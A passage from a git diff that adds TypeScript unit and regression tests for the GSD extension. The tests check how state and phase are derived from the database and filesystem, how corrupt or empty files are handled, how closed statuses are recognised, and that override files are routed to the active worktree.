+      writeRoadmap(base, "M001", standardRoadmap());
+      writePlan(base, "M001", "S01", standardPlan());
+
+      invalidateStateCache();
+      const dbState = await deriveStateFromDb(base);
+
+      closeDatabase();
+
+      invalidateStateCache();
+      const fsState = await deriveState(base);
+
+      assert.equal(dbState.phase, "executing", "DB path should produce executing");
+      assert.equal(fsState.phase, "executing", "filesystem path should produce executing");
+      assert.equal(dbState.activeTask?.id, fsState.activeTask?.id, "active task should match");
+    });
+
+    test("summarizing scenario produces same phase on both paths", async () => {
+      const base = createFixtureBase();
+      const dbPath = join(base, ".gsd", "gsd.db");
+      openDatabase(dbPath);
+
+      insertMilestone({ id: "M001", title: "M001: Test", status: "active" });
+      insertSlice({ id: "S01", milestoneId: "M001", title: "S01: Slice", status: "active", depends: [] });
+      insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", title: "T01: First", status: "complete" });
+      insertTask({ id: "T02", sliceId: "S01", milestoneId: "M001", title: "T02: Second", status: "complete" });
+
+      writeRoadmap(base, "M001", standardRoadmap());
+      writePlan(base, "M001", "S01", allDonePlan());
+
+      invalidateStateCache();
+      const dbState = await deriveStateFromDb(base);
+
+      closeDatabase();
+
+      invalidateStateCache();
+      const fsState = await deriveState(base);
+
+      assert.equal(dbState.phase, "summarizing", "DB path should produce summarizing");
+      assert.equal(fsState.phase, "summarizing", "filesystem path should produce summarizing");
+    });
+  });
+
+  // ═══════════════════════════════════════════════════════════════════════════
+  // EDGE CASES
+  // ═══════════════════════════════════════════════════════════════════════════
+
+  describe("Edge cases", () => {
+    test("isValidationTerminal: terminal verdicts", () => {
+      assert.equal(isValidationTerminal("---\nverdict: pass\n---\n"), true, "pass is terminal");
+      assert.equal(isValidationTerminal("---\nverdict: fail\n---\n"), true, "fail is terminal");
+      assert.equal(isValidationTerminal("---\nverdict: needs-remediation\n---\n"), true, "needs-remediation is terminal");
+      assert.equal(isValidationTerminal("---\nverdict: needs-attention\n---\n"), true, "needs-attention is terminal");
+    });
+
+    test("isValidationTerminal: non-terminal content", () => {
+      assert.equal(isValidationTerminal("No frontmatter at all"), false, "no frontmatter is not terminal");
+      assert.equal(isValidationTerminal(""), false, "empty string is not terminal");
+      assert.equal(isValidationTerminal("---\n---\n"), false, "empty frontmatter is not terminal");
+    });
+
+    test("isClosedStatus boundary", () => {
+      assert.equal(isClosedStatus("complete"), true);
+      assert.equal(isClosedStatus("done"), true);
+      assert.equal(isClosedStatus("pending"), false);
+      assert.equal(isClosedStatus("in-progress"), false);
+      assert.equal(isClosedStatus("blocked"), false);
+      assert.equal(isClosedStatus("active"), false);
+      assert.equal(isClosedStatus(""), false);
+    });
+
+    test("multiple milestones: M001 complete, M002 active → M002 is activeMilestone", async () => {
+      const base = createFixtureBase();
+      // M001: complete
+      writeRoadmap(base, "M001", doneSliceRoadmap());
+      writeMilestoneValidation(base, "M001", "pass");
+      writeMilestoneSummary(base, "M001");
+
+      // M002: active, in planning phase
+      writeContext(base, "M002", "# M002: Next Milestone\n\nContext for M002.");
+      writeRoadmap(base, "M002", [
+        "# M002: Next Milestone",
+        "",
+        "**Vision:** Next phase.",
+        "",
+        "## Slices",
+        "",
+        "- [ ] **S01: New Slice** `risk:low` `depends:[]`",
+        "  > After this: done.",
+      ].join("\n"));
+
+      invalidateStateCache();
+      const state = await deriveState(base);
+
+      assert.equal(state.activeMilestone?.id, "M002", "active milestone should be M002");
+      assert.notEqual(state.phase, "complete", "should not be complete while M002 is active");
+      // M001 in registry as complete
+      const m001 = state.registry.find(e => e.id === "M001");
+      assert.ok(m001 !== undefined, "M001 should be in registry");
+      assert.equal(m001?.status, "complete", "M001 should be complete");
+      // M002 in registry as active
+      const m002 = state.registry.find(e => e.id === "M002");
+      assert.ok(m002 !== undefined, "M002 should be in registry");
+      assert.equal(m002?.status, "active", "M002 should be active");
+    });
+  });
+
+  // ═══════════════════════════════════════════════════════════════════════════
+  // FAILURE MODES: What happens when things go wrong
+  // ═══════════════════════════════════════════════════════════════════════════
+
+  describe("Recovery: DB has slice but no task rows (partial migration)", () => {
+    test("DB tasks empty but PLAN on disk has tasks → reconciles to executing", async () => {
+      const base = createFixtureBase();
+      const dbPath = join(base, ".gsd", "gsd.db");
+      openDatabase(dbPath);
+
+      insertMilestone({ id: "M001", title: "M001: Test", status: "active" });
+      insertSlice({ id: "S01", milestoneId: "M001", title: "S01: Slice", status: "active", depends: [] });
+      // NO insertTask() — simulates partial migration / failed write
+
+      writeRoadmap(base, "M001", standardRoadmap());
+      writePlan(base, "M001", "S01", standardPlan());
+
+      invalidateStateCache();
+      const state = await deriveStateFromDb(base);
+
+      // FIX (#3600): plan-file tasks are now reconciled into the DB,
+      // so the phase correctly advances to executing instead of planning.
+      assert.equal(state.phase, "executing",
+        "reconciled plan-file tasks → executing (not stuck in planning)");
+    });
+  });
+
+  describe("Failure: partial SUMMARY reconciliation", () => {
+    test("only one task has SUMMARY, other still pending → executing next task", async () => {
+      const base = createFixtureBase();
+      const dbPath = join(base, ".gsd", "gsd.db");
+      openDatabase(dbPath);
+
+      insertMilestone({ id: "M001", title: "M001: Test", status: "active" });
+      insertSlice({ id: "S01", milestoneId: "M001", title: "S01: Slice", status: "active", depends: [] });
+      insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", title: "T01: Task", status: "pending" });
+      insertTask({ id: "T02", sliceId: "S01", milestoneId: "M001", title: "T02: Task", status: "pending" });
+
+      writeRoadmap(base, "M001", standardRoadmap());
+      writePlan(base, "M001", "S01", standardPlan());
+      // Only T01 has SUMMARY, T02 does not
+      writeTaskSummary(base, "M001", "S01", "T01");
+
+      invalidateStateCache();
+      const state = await deriveStateFromDb(base);
+
+      // T01 reconciled to complete, T02 still pending → executing T02
+      assert.equal(state.phase, "executing");
+      assert.equal(state.activeTask?.id, "T02", "should advance to next pending task");
+    });
+  });
+
+  describe("Failure: 0-byte files", () => {
+    test("0-byte SUMMARY file triggers reconciliation (existsSync-only check)", async () => {
+      const base = createFixtureBase();
+      writeRoadmap(base, "M001", standardRoadmap());
+      writePlan(base, "M001", "S01", standardPlan());
+      // Write 0-byte SUMMARY — existsSync returns true for empty files
+      const tasksDir = join(base, ".gsd", "milestones", "M001", "slices", "S01", "tasks");
+      mkdirSync(tasksDir, { recursive: true });
+      writeFileSync(join(tasksDir, "T01-SUMMARY.md"), "");
+
+      invalidateStateCache();
+      clearPathCache();
+      const state = await deriveState(base);
+
+      // The reconciler checks existsSync(summaryPath) at line 1328
+      // — it does NOT read content. So 0-byte file counts as "done".
+      // This is a known gap: empty SUMMARY treated as completion.
+      assert.equal(state.phase, "executing",
+        "0-byte SUMMARY marks T01 done via reconciliation, T02 becomes active");
+      assert.equal(state.activeTask?.id, "T02");
+    });
+
+    test("0-byte VALIDATION file → stays in validating-milestone", async () => {
+      const base = createFixtureBase();
+      writeRoadmap(base, "M001", doneSliceRoadmap());
+      const dir = join(base, ".gsd", "milestones", "M001");
+      mkdirSync(dir, { recursive: true });
+      writeFileSync(join(dir, "M001-VALIDATION.md"), "");
+
+      invalidateStateCache();
+      const state = await deriveState(base);
+
+      assert.equal(state.phase, "validating-milestone",
+        "0-byte VALIDATION should not be treated as terminal");
+    });
+
+    test("0-byte PLAN file → planning phase", async () => {
+      const base = createFixtureBase();
+      writeRoadmap(base, "M001", standardRoadmap());
+      const dir = join(base, ".gsd", "milestones", "M001", "slices", "S01");
+      mkdirSync(dir, { recursive: true });
+      writeFileSync(join(dir, "S01-PLAN.md"), "");
+
+      invalidateStateCache();
+      const state = await deriveState(base);
+
+      assert.equal(state.phase, "planning", "0-byte PLAN should stay in planning");
+    });
+  });
+
+  describe("Failure: DB/filesystem divergence", () => {
+    test("DB says slice complete, no milestone VALIDATION → validating-milestone", async () => {
+      const base = createFixtureBase();
+      const dbPath = join(base, ".gsd", "gsd.db");
+      openDatabase(dbPath);
+
+      insertMilestone({ id: "M001", title: "M001: Test", status: "active" });
+      insertSlice({ id: "S01", milestoneId: "M001", title: "S01: Slice", status: "complete", depends: [] });
+
+      writeRoadmap(base, "M001", doneSliceRoadmap());
+
+      invalidateStateCache();
+      const state = await deriveStateFromDb(base);
+
+      assert.equal(state.phase, "validating-milestone",
+        "DB-complete slice should trigger milestone validation");
+    });
+
+    test("DB says task complete but SUMMARY missing → no crash, advances to next", async () => {
+      const base = createFixtureBase();
+      const dbPath = join(base, ".gsd", "gsd.db");
+      openDatabase(dbPath);
+
+      insertMilestone({ id: "M001", title: "M001: Test", status: "active" });
+      insertSlice({ id: "S01", milestoneId: "M001", title: "S01: Slice", status: "active", depends: [] });
+      insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", title: "T01: Task", status: "complete" });
+      insertTask({ id: "T02", sliceId: "S01", milestoneId: "M001", title: "T02: Task", status: "pending" });
+
+      writeRoadmap(base, "M001", standardRoadmap());
+      writePlan(base, "M001", "S01", standardPlan());
+
+      invalidateStateCache();
+      const state = await deriveStateFromDb(base);
+
+      assert.equal(state.phase, "executing");
+      assert.equal(state.activeTask?.id, "T02");
+    });
+
+    test("milestone in DB but directory missing from disk → no crash", async () => {
+      const base = createFixtureBase();
+      const dbPath = join(base, ".gsd", "gsd.db");
+      openDatabase(dbPath);
+
+      insertMilestone({ id: "M001", title: "M001: Test", status: "active" });
+
+      invalidateStateCache();
+      const state = await deriveStateFromDb(base);
+
+      assert.ok(state.phase !== undefined, "should produce a valid phase");
+    });
+  });
+
+  describe("Failure: corrupt frontmatter", () => {
+    test("VALIDATION with broken frontmatter → stays in validating", async () => {
+      const base = createFixtureBase();
+      writeRoadmap(base, "M001", doneSliceRoadmap());
+      const dir = join(base, ".gsd", "milestones", "M001");
+      mkdirSync(dir, { recursive: true });
+      writeFileSync(join(dir, "M001-VALIDATION.md"), [
+        "---",
+        "this is not: valid: yaml: {{{}}}",
+        "---",
+        "",
+        "Some content.",
+      ].join("\n"));
+
+      invalidateStateCache();
+      const state = await deriveState(base);
+
+      assert.equal(state.phase, "validating-milestone",
+        "corrupt frontmatter should keep milestone in validating phase");
+    });
+
+    test("CONTEXT with broken depends_on → no crash, deps empty", async () => {
+      const base = createFixtureBase();
+      writeContext(base, "M001", [
+        "---",
+        "depends_on: {{{invalid}}}",
+        "---",
+        "",
+        "# M001: Test",
+      ].join("\n"));
+      writeRoadmap(base, "M001", standardRoadmap());
+
+      invalidateStateCache();
+      const state = await deriveState(base);
+
+      assert.ok(state.phase !== undefined, "should not crash on corrupt depends_on");
+      // With corrupt deps, parseContextDependsOn returns [] → no blocking
+      assert.notEqual(state.phase, "blocked",
+        "corrupt deps should not falsely block milestone");
+    });
+  });
+
+  describe("Failure: missing task plan files in DB path", () => {
+    test("DB has tasks but no T##-PLAN.md files → planning phase", async () => {
+      const base = createFixtureBase();
+      const dbPath = join(base, ".gsd", "gsd.db");
+      openDatabase(dbPath);
+
+      insertMilestone({ id: "M001", title: "M001: Test", status: "active" });
+      insertSlice({ id: "S01", milestoneId: "M001", title: "S01: Slice", status: "active", depends: [] });
+      insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", title: "T01: Task", status: "pending" });
+
+      writeRoadmap(base, "M001", standardRoadmap());
+      const dir = join(base, ".gsd", "milestones", "M001", "slices", "S01");
+      mkdirSync(join(dir, "tasks"), { recursive: true });
+      writeFileSync(join(dir, "S01-PLAN.md"), standardPlan());
+      // NO T01-PLAN.md
+
+      invalidateStateCache();
+      const state = await deriveStateFromDb(base);
+
+      assert.equal(state.phase, "planning",
+        "missing T##-PLAN.md files should keep state in planning");
+    });
+  });
+
+  describe("Failure: stale path cache", () => {
+    test("file created after cache populated → must clear path cache", async () => {
+      const base = createFixtureBase();
+      writeRoadmap(base, "M001", standardRoadmap());
+
+      invalidateStateCache();
+      clearPathCache();
+      const state1 = await deriveState(base);
+      assert.equal(state1.phase, "planning");
+
+      // Write PLAN AFTER first derivation cached paths
+      writePlan(base, "M001", "S01", standardPlan());
+
+      // Without clearPathCache, stale cache may miss the new file
+      invalidateStateCache();
+      clearPathCache();
+      const state2 = await deriveState(base);
+
+      assert.equal(state2.phase, "executing",
+        "after cache clear, should see the new PLAN file");
+    });
+  });
+
+  describe("Failure: blocker detection edge cases", () => {
+    test("filesystem: blocker in SUMMARY but task not marked [x] → still detected", async () => {
+      const base = createFixtureBase();
+      writeRoadmap(base, "M001", standardRoadmap());
+      // T01 marked done in plan, T02 pending
+      writePlan(base, "M001", "S01", partialDonePlan());
+      // T01 SUMMARY has blocker_discovered in frontmatter
+      writeTaskSummaryWithBlocker(base, "M001", "S01", "T01");
+
+      invalidateStateCache();
+      clearPathCache();
+      const state = await deriveState(base);
+
+      assert.equal(state.phase, "replanning-slice",
+        "blocker_discovered in SUMMARY frontmatter should trigger replanning");
+    });
+  });
+
+  // ═══════════════════════════════════════════════════════════════════════════
+  // FAILURE AT EVERY PHASE: What breaks mid-transition
+  // ═══════════════════════════════════════════════════════════════════════════
+
+  describe("Failure at pre-planning: CONTEXT file half-written", () => {
+    test("CONTEXT exists but is garbage → still enters pre-planning (no roadmap)", async () => {
+      const base = createFixtureBase();
+      writeContext(base, "M001", "\x00\x00\x00binary garbage\xff\xfe");
+      invalidateStateCache();
+      clearPathCache();
+      const state = await deriveState(base);
+
+      // File exists so milestone is not ghost, but no roadmap → pre-planning
+      assert.equal(state.phase, "pre-planning");
+      assert.ok(state.activeMilestone !== null);
+    });
+  });
+
+  describe("Failure at needs-discussion: CONTEXT-DRAFT is empty", () => {
+    test("0-byte CONTEXT-DRAFT → should still trigger needs-discussion", async () => {
+      const base = createFixtureBase();
+      const dir = join(base, ".gsd", "milestones", "M001");
+      mkdirSync(dir, { recursive: true });
+      writeFileSync(join(dir, "M001-CONTEXT-DRAFT.md"), "");
+      invalidateStateCache();
+      clearPathCache();
+      const state = await deriveState(base);
+
+      // File exists (even empty) → not a ghost, has draft → needs-discussion
+      assert.equal(state.phase, "needs-discussion",
+        "0-byte draft should still trigger discussion phase");
+    });
+  });
+
+  describe("Failure at planning: ROADMAP exists but is unparseable", () => {
+    test("ROADMAP with no slices section → pre-planning (zero slices)", async () => {
+      const base = createFixtureBase();
+      writeRoadmap(base, "M001", "# M001: Test\n\nJust some text, no ## Slices section.");
+      invalidateStateCache();
+      clearPathCache();
+      const state = await deriveState(base);
+
+      // parseRoadmap finds no slices → empty array → pre-planning
+      assert.equal(state.phase, "pre-planning",
+        "unparseable roadmap with no slices should fall to pre-planning");
+    });
+
+    test("ROADMAP with broken slice syntax → treats as zero slices", async () => {
+      const base = createFixtureBase();
+      writeRoadmap(base, "M001", [
+        "# M001: Test",
+        "",
+        "**Vision:** Test.",
+        "",
+        "## Slices",
+        "",
+        "This is not a valid slice entry at all.",
+        "Neither is this.",
+      ].join("\n"));
+      invalidateStateCache();
+      clearPathCache();
+      const state = await deriveState(base);
+
+      // No parseable slice entries → zero slices → pre-planning
+      assert.equal(state.phase, "pre-planning",
+        "broken slice syntax should result in zero slices");
+    });
+  });
+
+  describe("Failure at planning: PLAN file is corrupt", () => {
+    test("PLAN exists but tasks section is garbage → zero tasks → planning", async () => {
+      const base = createFixtureBase();
+      writeRoadmap(base, "M001", standardRoadmap());
+      const dir = join(base, ".gsd", "milestones", "M001", "slices", "S01");
+      mkdirSync(dir, { recursive: true });
+      writeFileSync(join(dir, "S01-PLAN.md"), [
+        "# S01: Slice",
+        "",
+        "## Tasks",
+        "",
+        "random garbage with no task markers",
+        "more garbage",
+      ].join("\n"));
+      invalidateStateCache();
+      clearPathCache();
+      const state = await deriveState(base);
+
+      assert.equal(state.phase, "planning",
+        "PLAN with unparseable tasks should stay in planning");
+    });
+  });
+
+  describe("Failure at executing: task plan file is empty", () => {
+    test("T01-PLAN.md exists but is 0-byte → still enters executing", async () => {
+      const base = createFixtureBase();
+      writeRoadmap(base, "M001", standardRoadmap());
+      const dir = join(base, ".gsd", "milestones", "M001", "slices", "S01");
+      const tasksDir = join(dir, "tasks");
+      mkdirSync(tasksDir, { recursive: true });
+      writeFileSync(join(dir, "S01-PLAN.md"), standardPlan());
+      // Create task plan files but make them 0-byte
+      writeFileSync(join(tasksDir, "T01-PLAN.md"), "");
+      writeFileSync(join(tasksDir, "T02-PLAN.md"), "");
+      invalidateStateCache();
+      clearPathCache();
+      const state = await deriveState(base);
+
+      // Task plan file existence check at line 718-730 uses readdirSync
+      // to count .md files. 0-byte files still count.
+      assert.equal(state.phase, "executing",
+        "0-byte task plan files still pass the existence check");
+    });
+  });
+
+  describe("Failure at executing: DB has task but wrong status string", () => {
+    test("task with unexpected status string → not treated as closed", async () => {
+      const base = createFixtureBase();
+      const dbPath = join(base, ".gsd", "gsd.db");
+      openDatabase(dbPath);
+
+      insertMilestone({ id: "M001", title: "M001: Test", status: "active" });
+      insertSlice({ id: "S01", milestoneId: "M001", title: "S01: Slice", status: "active", depends: [] });
+      insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", title: "T01: Task", status: "pending" });
+
+      // Set a garbage status that isn't "complete" or "done"
+      updateTaskStatus("M001", "S01", "T01", "finished");
+
+      writeRoadmap(base, "M001", standardRoadmap());
+      writePlan(base, "M001", "S01", standardPlan());
+
+      invalidateStateCache();
+      const state = await deriveStateFromDb(base);
+
+      // isClosedStatus("finished") → false → task treated as active
+      assert.equal(state.phase, "executing");
+      assert.equal(state.activeTask?.id, "T01",
+        "non-standard status 'finished' is NOT treated as closed");
+    });
+  });
+
+  describe("Failure at summarizing: slice SUMMARY write fails (file missing)", () => {
+    test("all tasks [x] but no slice SUMMARY → stays in summarizing", async () => {
+      const base = createFixtureBase();
+      writeRoadmap(base, "M001", standardRoadmap());
+      writePlan(base, "M001", "S01", allDonePlan());
+      // All tasks done but no S01-SUMMARY.md written
+      invalidateStateCache();
+      clearPathCache();
+      const state = await deriveState(base);
+
+      assert.equal(state.phase, "summarizing");
+      // Next derivation still returns summarizing — no infinite loop
+      invalidateStateCache();
+      const state2 = await deriveState(base);
+      assert.equal(state2.phase, "summarizing", "stays in summarizing until SUMMARY written");
+    });
+  });
+
+  describe("Failure at validating-milestone: VALIDATION write crashes", () => {
+    test("all slices done, validation never written → stuck in validating", async () => {
+      const base = createFixtureBase();
+      writeRoadmap(base, "M001", doneSliceRoadmap());
+      // No VALIDATION file at all
+      invalidateStateCache();
+      clearPathCache();
+      const state = await deriveState(base);
+      assert.equal(state.phase, "validating-milestone");
+
+      // Call again — still validating (idempotent, not looping)
+      invalidateStateCache();
+      const state2 = await deriveState(base);
+      assert.equal(state2.phase, "validating-milestone",
+        "stays in validating until VALIDATION file appears");
+    });
+  });
+
+  describe("Failure at completing-milestone: SUMMARY write fails", () => {
+    test("validation terminal but SUMMARY never written → stuck in completing", async () => {
+      const base = createFixtureBase();
+      writeRoadmap(base, "M001", doneSliceRoadmap());
+      writeMilestoneValidation(base, "M001", "pass");
+      // No milestone SUMMARY
+      invalidateStateCache();
+      clearPathCache();
+      const state = await deriveState(base);
+      assert.equal(state.phase, "completing-milestone");
+
+      // Repeated calls stay in completing
+      invalidateStateCache();
+      const state2 = await deriveState(base);
+      assert.equal(state2.phase, "completing-milestone",
+        "stays in completing until SUMMARY written");
+    });
+  });
+
+  describe("Failure at replanning: REPLAN.md never written (loop risk)", () => {
+    test("blocker detected, replan dispatched but REPLAN.md not created → re-enters replanning", async () => {
+      const base = createFixtureBase();
+      writeRoadmap(base, "M001", standardRoadmap());
+      writePlan(base, "M001", "S01", partialDonePlan());
+      writeTaskSummaryWithBlocker(base, "M001", "S01", "T01");
+      // No REPLAN.md — simulates failed replan execution
+
+      invalidateStateCache();
+      clearPathCache();
+      const state1 = await deriveState(base);
+      assert.equal(state1.phase, "replanning-slice");
+
+      // Call again — same result, stuck in replanning until REPLAN.md appears
+      invalidateStateCache();
+      const state2 = await deriveState(base);
+      assert.equal(state2.phase, "replanning-slice",
+        "without REPLAN.md, state stays in replanning (dispatch will retry)");
+    });
+  });
+
+  describe("Failure at complete: SUMMARY exists but VALIDATION missing", () => {
+    test("milestone SUMMARY without VALIDATION → still complete (SUMMARY is terminal artifact)", async () => {
+      const base = createFixtureBase();
+      writeRoadmap(base, "M001", doneSliceRoadmap());
+      // SUMMARY exists but NO VALIDATION
+      writeMilestoneSummary(base, "M001");
+      invalidateStateCache();
+      clearPathCache();
+      const state = await deriveState(base);
+
+      // Per #864: SUMMARY is the terminal artifact, validation optional
+      assert.equal(state.phase, "complete",
+        "SUMMARY alone should mark milestone complete per #864");
+    });
+  });
+
+  describe("Failure at blocked: dependency milestone partially complete", () => {
+    test("M001 has slices done but no SUMMARY → M002 (depends on M001) is blocked", async () => {
+      const base = createFixtureBase();
+      // M001: all slices done but no SUMMARY/VALIDATION
+      writeRoadmap(base, "M001", doneSliceRoadmap());
+      // M001 has no SUMMARY → it's in validating/completing, NOT complete
+
+      // M002: depends on M001
+      writeContext(base, "M002", [
+        "---",
+        "depends_on:",
+        "  - M001",
+        "---",
+        "",
+        "# M002: Dependent",
+      ].join("\n"));
+      writeRoadmap(base, "M002", [
+        "# M002: Dependent",
+        "",
+        "**Vision:** Test.",
+        "",
+        "## Slices",
+        "",
+        "- [ ] **S01: Slice** `risk:low` `depends:[]`",
+        "  > After this: done.",
+      ].join("\n"));
+
+      invalidateStateCache();
+      clearPathCache();
+      const state = await deriveState(base);
+
+      // M001 is active (not yet complete), M002 should wait
+      assert.equal(state.activeMilestone?.id, "M001",
+        "M001 should be active (not complete without SUMMARY)");
+      assert.notEqual(state.activeMilestone?.id, "M002",
+        "M002 should not be active while M001 is incomplete");
+    });
+  });
+
+  describe("Failure: multiple reconciliation in single derivation", () => {
+    test("DB has 3 stale tasks, all with SUMMARY on disk → all reconciled in one pass", async () => {
+      const base = createFixtureBase();
+      const dbPath = join(base, ".gsd", "gsd.db");
+      openDatabase(dbPath);
+
+      insertMilestone({ id: "M001", title: "M001: Test", status: "active" });
+      insertSlice({ id: "S01", milestoneId: "M001", title: "S01: Slice", status: "active", depends: [] });
+      insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", title: "T01", status: "pending" });
+      insertTask({ id: "T02", sliceId: "S01", milestoneId: "M001", title: "T02", status: "in-progress" });
+      insertTask({ id: "T03", sliceId: "S01", milestoneId: "M001", title: "T03", status: "pending" });
+
+      const threeTaskRoadmap = [
+        "# M001: Test",
+        "",
+        "**Vision:** Test.",
+        "",
+        "## Slices",
+        "",
+        "- [ ] **S01: Slice** `risk:low` `depends:[]`",
+        "  > After this: done.",
+      ].join("\n");
+      writeRoadmap(base, "M001", threeTaskRoadmap);
+
+      const threeTaskPlan = [
+        "# S01: Slice",
+        "",
+        "**Goal:** Test.",
+        "**Demo:** Tests pass.",
+        "",
+        "## Tasks",
+        "",
+        "- [ ] **T01: First** `est:10m`",
+        "  First.",
+        "",
+        "- [ ] **T02: Second** `est:10m`",
+        "  Second.",
+        "",
+        "- [ ] **T03: Third** `est:10m`",
+        "  Third.",
+      ].join("\n");
+      writePlan(base, "M001", "S01", threeTaskPlan);
+
+      // All 3 tasks have SUMMARY on disk
+      writeTaskSummary(base, "M001", "S01", "T01");
+      writeTaskSummary(base, "M001", "S01", "T02");
+      writeTaskSummary(base, "M001", "S01", "T03");
+
+      invalidateStateCache();
+      const state = await deriveStateFromDb(base);
+
+      // All 3 should be reconciled in one pass → summarizing
+      assert.equal(state.phase, "summarizing",
+        "all 3 stale tasks should be reconciled to complete in one derivation");
+    });
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/status-db-open.test.ts b/src/resources/extensions/gsd/tests/status-db-open.test.ts
new file mode 100644
index 000000000..1fbd1aeb4
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/status-db-open.test.ts
@@ -0,0 +1,47 @@
+/**
+ * Regression test for #3691 — /gsd status opens DB before deriveState
+ *
+ * In cold sessions the DB was not opened before deriveState, causing
+ * status to fall back to filesystem-only state.  The fix adds an
+ * ensureDbOpen() call before deriveState in handleStatus.
+ *
+ * Also verifies that quick.ts checks getIsolationMode before branching.
+ */
+
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
+import { readFileSync } from 'node:fs';
+import { fileURLToPath } from 'node:url';
+import { dirname, join } from 'node:path';
+
+const __filename = fileURLToPath(import.meta.url);
+const __dirname = dirname(__filename);
+
+const coreSrc = readFileSync(
+  join(__dirname, '..', 'commands', 'handlers', 'core.ts'),
+  'utf-8',
+);
+const quickSrc = readFileSync(
+  join(__dirname, '..', 'quick.ts'),
+  'utf-8',
+);
+
+describe('status opens DB before deriveState (#3691)', () => {
+  test('handleStatus calls ensureDbOpen before deriveState', () => {
+    const ensureIdx = coreSrc.indexOf('ensureDbOpen');
+    const deriveIdx = coreSrc.indexOf('deriveState(basePath)');
+    assert.ok(ensureIdx > -1, 'ensureDbOpen call should exist in core.ts');
+    assert.ok(deriveIdx > -1, 'deriveState(basePath) call should exist in core.ts');
+    assert.ok(
+      ensureIdx < deriveIdx,
+      'ensureDbOpen must appear before deriveState so DB is ready',
+    );
+  });
+
+  test('quick.ts checks getIsolationMode before branching', () => {
+    assert.match(quickSrc, /getIsolationMode\(\)/,
+      'quick.ts should call getIsolationMode()');
+    assert.match(quickSrc, /getIsolationMode\(\)\s*!==\s*"none"/,
+      'quick.ts should compare isolation mode against "none"');
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/status-guards.test.ts b/src/resources/extensions/gsd/tests/status-guards.test.ts
new file mode 100644
index 000000000..03bbd23de
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/status-guards.test.ts
@@ -0,0 +1,34 @@
+// GSD — status-guards unit tests
+
+import test from 'node:test';
+import assert from 'node:assert/strict';
+
+import { isClosedStatus } from '../status-guards.ts';
+
+test('isClosedStatus: "complete" returns true', () => {
+  assert.equal(isClosedStatus('complete'), true);
+});
+
+test('isClosedStatus: "done" returns true', () => {
+  assert.equal(isClosedStatus('done'), true);
+});
+
+test('isClosedStatus: "skipped" returns true', () => {
+  assert.equal(isClosedStatus('skipped'), true);
+});
+
+test('isClosedStatus: "pending" returns false', () => {
+  assert.equal(isClosedStatus('pending'), false);
+});
+
+test('isClosedStatus: "in_progress" returns false', () => {
+  assert.equal(isClosedStatus('in_progress'), false);
+});
+
+test('isClosedStatus: "active" returns false', () => {
+  assert.equal(isClosedStatus('active'), false);
+});
+
+test('isClosedStatus: "" (empty string) returns false', () => {
+  assert.equal(isClosedStatus(''), false);
+});
diff --git a/src/resources/extensions/gsd/tests/steer-worktree-path.test.ts b/src/resources/extensions/gsd/tests/steer-worktree-path.test.ts
new file mode 100644
index 000000000..137eb6cd6
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/steer-worktree-path.test.ts
@@ -0,0 +1,108 @@
+// GSD Extension - Steer Worktree Path Resolution Test
+// Regression test for #3476: /gsd steer must write overrides to the worktree .gsd/,
+// not the project root .gsd/, when a worktree is active.
+
+import { describe, test, beforeEach, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import { mkdtempSync, mkdirSync, existsSync, readFileSync, rmSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+import { appendOverride, loadActiveOverrides } from "../files.ts";
+import { getAutoWorktreePath } from "../auto-worktree.ts";
+
+describe("steer worktree path resolution (#3476)", () => {
+  let projectRoot: string;
+  let worktreePath: string;
+
+  beforeEach(() => {
+    projectRoot = mkdtempSync(join(tmpdir(), "gsd-steer-wt-"));
+    mkdirSync(join(projectRoot, ".gsd"), { recursive: true });
+
+    // Simulate a worktree with its own .gsd directory
+    worktreePath = join(projectRoot, ".gsd", "worktrees", "M001");
+    mkdirSync(join(worktreePath, ".gsd"), { recursive: true });
+  });
+
+  afterEach(() => {
+    rmSync(projectRoot, { recursive: true, force: true });
+  });
+
+  test("appendOverride writes to worktree .gsd/ when worktree path is used", async () => {
+    await appendOverride(worktreePath, "Use Postgres instead of SQLite", "M001/S01/T01");
+
+    // Override should be in the worktree .gsd/
+    const wtOverrides = join(worktreePath, ".gsd", "OVERRIDES.md");
+    assert.ok(existsSync(wtOverrides), "override file exists in worktree .gsd/");
+
+    const content = readFileSync(wtOverrides, "utf-8");
+    assert.ok(content.includes("Use Postgres instead of SQLite"), "override content is correct");
+
+    // Override should NOT be in the project root .gsd/
+    const rootOverrides = join(projectRoot, ".gsd", "OVERRIDES.md");
+    assert.ok(!existsSync(rootOverrides), "no override file in project root .gsd/");
+  });
+
+  test("loadActiveOverrides reads from worktree .gsd/ when worktree path is used", async () => {
+    await appendOverride(worktreePath, "Switch to JWT auth", "M001/S02/T01");
+
+    // Loading from worktree should find the override
+    const wtOverrides = await loadActiveOverrides(worktreePath);
+    assert.equal(wtOverrides.length, 1, "one active override in worktree");
+    assert.equal(wtOverrides[0].change, "Switch to JWT auth");
+
+    // Loading from project root should find nothing
+    const rootOverrides = await loadActiveOverrides(projectRoot);
+    assert.equal(rootOverrides.length, 0, "no overrides in project root");
+  });
+
+  test("appendOverride falls back to project root when no worktree exists", async () => {
+    await appendOverride(projectRoot, "Use Redis cache", "M001/S01/T01");
+
+    const rootOverrides = join(projectRoot, ".gsd", "OVERRIDES.md");
+    assert.ok(existsSync(rootOverrides), "override file exists in project root .gsd/");
+
+    const content = readFileSync(rootOverrides, "utf-8");
+    assert.ok(content.includes("Use Redis cache"), "override content is correct");
+  });
+
+  test("getAutoWorktreePath returns null for worktree without valid .git file", () => {
+    // The worktree directory exists but has no .git file — this is an inactive/
+    // leftover worktree. getAutoWorktreePath must return null so handleSteer
+    // does not route overrides to a dead worktree.
+    const result = getAutoWorktreePath(projectRoot, "M001");
+    assert.equal(result, null, "returns null for worktree without .git file");
+  });
+
+  test("override routing: inactive worktree directory should not receive overrides", async () => {
+    // Simulate the handleSteer path-resolution logic:
+    // When no auto-mode is running, even if a worktree dir exists,
